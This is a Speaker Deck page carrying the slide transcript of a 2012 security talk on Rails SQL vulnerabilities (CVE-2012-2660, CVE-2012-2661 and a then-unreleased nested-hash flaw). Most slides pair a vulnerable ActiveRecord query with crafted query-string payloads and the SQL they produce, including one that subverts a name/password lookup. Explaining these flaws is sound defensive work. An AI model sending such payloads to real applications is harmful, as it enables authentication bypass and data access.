Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Speaker Deck
PRO
Sign in
Sign up
for free
"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Programming
0
46
"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Tweet
Share
More Decks by Justin Collins
See All by Justin Collins
presidentbeef
0
29
presidentbeef
1
330
presidentbeef
0
75
presidentbeef
0
120
presidentbeef
1
250
presidentbeef
1
230
presidentbeef
0
130
presidentbeef
8
940
presidentbeef
1
120
Other Decks in Programming
See All in Programming
korosuke613
2
260
legalforce
PRO
0
640
mackee
0
600
tkmnzm
0
120
layzee
1
220
tooppoo
0
170
naokioouchi
1
300
danilop
0
230
mizotake
2
320
xrdnk
0
130
boriswilhelms
0
150
joergneumann
0
140
Featured
See All Featured
addyosmani
311
21k
chrislema
173
14k
robhawkes
52
2.8k
jonyablonski
19
1.2k
roundedbygravity
84
7.9k
philhawksworth
192
8.8k
rocio
155
11k
qrush
285
19k
smashingmag
230
18k
ddemaree
273
31k
lara
15
2.7k
philnash
9
590
Transcript
Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661
CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x
and 3.x
ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end
Query Parameters ?name[] {"name"=>[nil]}
ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end
Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL
CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query
keys Affects Rails 3.x
ActiveRecord Query User.where(:name => params[:name])
ActiveRecord Query User.where("users.name" => params[:name])
Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}
ActiveRecord Query User.where(:name => {"users.id" => "1"})
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1
Unreleased Vulnerability Allows some manipulation of WHERE clause via nested
hashes in query values Affects 2.3.x and 3.x
ActiveRecord Query User.where(:name => params[:name], :password => params[:password])
Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}
ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1 AND "users"."id" = 1
presidentbeef
korosuke613
legalforce
mackee
tkmnzm
layzee
tooppoo
naokioouchi
danilop
mizotake
xrdnk
boriswilhelms
joergneumann
addyosmani
chrislema
robhawkes
jonyablonski
roundedbygravity
philhawksworth
rocio
qrush
smashingmag
ddemaree
lara
philnash
![ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_2.jpg){kind=link}
![Query Parameters ?name[] {"name"=>[nil]}](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_3.jpg){kind=link}
![ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_4.jpg){kind=link}
![ActiveRecord Query User.where(:name => params[:name])](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_7.jpg){kind=link}
![ActiveRecord Query User.where("users.name" => params[:name])](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_8.jpg){kind=link}
![Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_9.jpg){kind=link}
![ActiveRecord Query User.where(:name => params[:name], :password => params[:password])](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_13.jpg){kind=link}
![Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_14.jpg){kind=link}
